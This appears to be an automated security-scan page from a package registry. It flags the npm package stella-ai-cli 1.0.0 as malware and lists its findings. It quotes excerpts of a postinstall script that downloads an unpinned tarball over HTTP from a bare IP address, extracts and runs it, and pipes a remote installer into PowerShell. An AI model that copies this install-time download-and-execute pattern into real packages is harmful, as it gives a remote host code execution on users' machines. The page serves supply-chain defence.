registry  /  stella-ai-cli  /  1.0.0

stella-ai-cli@1.0.0

Stella AI — умный CLI-ассистент для разработки

AI Security Review

scanned 9d ago · by lpm-firewall-ai

The package runs a postinstall bootstrap that downloads a mutable remote tarball, extracts it into the user's home directory, installs dependencies, and later executes code from that location. This gives the remote host install-time and runtime code control outside the npm artifact.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install postinstall lifecycle and subsequent stella CLI execution
Impact
Arbitrary code execution from an unauthenticated remote HTTP payload during install/runtime.
Mechanism
install-time remote payload download/extract and execution
Attack narrative
On npm install, postinstall.js checks for Bun, optionally executes remote Bun installer shell commands, creates ~/.stella, downloads stella-latest.tar.gz from 62.238.2.22 over HTTP, extracts it, and runs bun install in that downloaded tree. The stella CLI then executes a TypeScript entrypoint from the downloaded ~/.stella tree with inherited environment variables and a default hub endpoint/token.
Rationale
Direct source inspection confirms unpinned install-time download and execution of a mutable HTTP payload outside the npm package. That is concrete remote code execution behavior rather than a benign bundled CLI entrypoint.
Evidence
package.jsonbin/postinstall.jsbin/stella.jsstella.cmd~/.stella~/.stella/stella.tar.gz~/.stella/packages/opencode/src/index.ts
Network endpoints4
62.238.2.22:8787/stella-latest.tar.gz62.238.2.22:8787bun.sh/installbun.sh/install.ps1

Decision evidence

public snapshot
AI called this Malicious at 96.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json defines install-time postinstall: node ./bin/postinstall.js.
  • bin/postinstall.js downloads http://62.238.2.22:8787/stella-latest.tar.gz over plaintext HTTP during install.
  • bin/postinstall.js extracts the downloaded tarball into ~/.stella and runs bun install there.
  • bin/postinstall.js pipes remote Bun installer scripts into shell/powershell when Bun is absent.
  • bin/stella.js executes ~/.stella/packages/opencode/src/index.ts with Bun and inherited environment.
  • bin/stella.js defaults STELLA_HUB_URL to http://62.238.2.22:8787 and token to stella-public.
Evidence against
  • No credential harvesting logic found in packaged source.
  • No persistence beyond the installed ~/.stella runtime directory and CLI wrapper was found.
  • The package presents as a CLI installer, but the install-time mutable remote payload is not bundled or integrity-pinned.
Behavioral surface
Source
ChildProcessEnvironmentVarsFilesystemNetworkShell
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 3.61 KB of source, external domains: 62.238.2.22, bun.sh

Source & flagged code

8 flagged · loading source
package.jsonView file
scripts.postinstall = node ./bin/postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node ./bin/postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
bin/stella.jsView file
1#!/usr/bin/env node L2: const { spawn } = require("child_process"); L3: const path = require("path");
High
Child Process

Package source references child process execution.

bin/stella.jsView on unpkg · L1
1#!/usr/bin/env node L2: const { spawn } = require("child_process"); L3: const path = require("path"); ... L5: L6: const STELLA_DIR = path.join(require("os").homedir(), ".stella"); L7: const BUN = process.platform === "win32" ? path.join(process.env.USERPROFILE, ".bun", "bin", "bun.exe") : path.join(require("os").homedir(), ".bun", "bin", "bun"); L8: ... L17: ...process.env, L18: STELLA_HUB_URL: process.env.STELLA_HUB_URL || "http://62.238.2.22:8787", L19: STELLA_HUB_TOKEN: process.env.STELLA_HUB_TOKEN || "stella-public",
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

bin/stella.jsView on unpkg · L1
bin/postinstall.jsView file
1#!/usr/bin/env node L2: const { execSync, spawn } = require("child_process"); L3: const path = require("path"); L4: const fs = require("fs"); L5: const https = require("https"); L6: const http = require("http"); ... L8: L9: const STELLA_DIR = path.join(os.homedir(), ".stella"); L10: const RELEASE_URL = "http://62.238.2.22:8787/stella-latest.tar.gz"; ... L17: console.log("→ Installing bun..."); L18: if (process.platform === "win32") { L19: execSync('powershell -c "irm bun.sh/install.ps1 | iex"', { stdio: "inherit" });
Critical
Download Execute

Source downloads or fetches remote code and executes it.

bin/postinstall.jsView on unpkg · L1
1Trigger-reachable chain: scripts.postinstall -> bin/postinstall.js L1: #!/usr/bin/env node L2: const { execSync, spawn } = require("child_process"); L3: const path = require("path"); L4: const fs = require("fs"); L5: const https = require("https"); L6: const http = require("http"); ... L8: L9: const STELLA_DIR = path.join(os.homedir(), ".stella"); L10: const RELEASE_URL = "http://62.238.2.22:8787/stella-latest.tar.gz"; ... L17: console.log("→ Installing bun..."); L18: if (process.platform === "win32") { L19: execSync('powershell -c "irm bun.sh/install.ps1 | iex"', { stdio: "inherit" });
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

bin/postinstall.jsView on unpkg · L1
18if (process.platform === "win32") { L19: execSync('powershell -c "irm bun.sh/install.ps1 | iex"', { stdio: "inherit" }); L20: } else {
High
Shell

Package source references shell execution.

bin/postinstall.jsView on unpkg · L18
stella.cmdView file
path = stella.cmd kind = build_helper sizeBytes = 39 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

stella.cmdView on unpkg

Findings

2 Critical4 High5 Medium3 Low
CriticalDownload Executebin/postinstall.js
CriticalTrigger Reachable Dangerous Capabilitybin/postinstall.js
HighInstall Time Lifecycle Scriptspackage.json
HighChild Processbin/stella.js
HighShellbin/postinstall.js
HighSandbox Evasion Gated Capabilitybin/stella.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
MediumShips Build Helperstella.cmd
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowUrl Strings